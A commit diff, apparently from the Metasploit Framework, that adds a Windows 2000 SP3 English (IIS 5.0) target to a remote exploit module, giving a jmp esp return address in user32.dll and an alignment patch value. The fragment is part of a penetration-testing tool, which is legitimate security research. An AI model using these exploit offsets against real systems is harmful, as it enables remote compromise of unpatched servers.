Added Aki Immonen's target for Windows 2000 SP3, thanks Aki!
git-svn-id: file:///home/svn/framework3/trunk@6995 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
41ab69c600
commit
1184f01742
|
@ -59,6 +59,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Patch' => 0x7ffd7ffd # works for off-by-two alignment
|
||||
},
|
||||
],
|
||||
[
|
||||
'Windows 2000 SP3 English (IIS 5.0)',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Ret' => 0x77e42ed8, # jmp esp in user32.dll (English / 5.0.2195.7032)
|
||||
'Patch' => 0x7ffd7ffd # works for off-by-two alignment
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Aug 31 2009',
|
||||
'DefaultTarget' => 0))
|
||||
|
|
Loading…
Reference in New Issue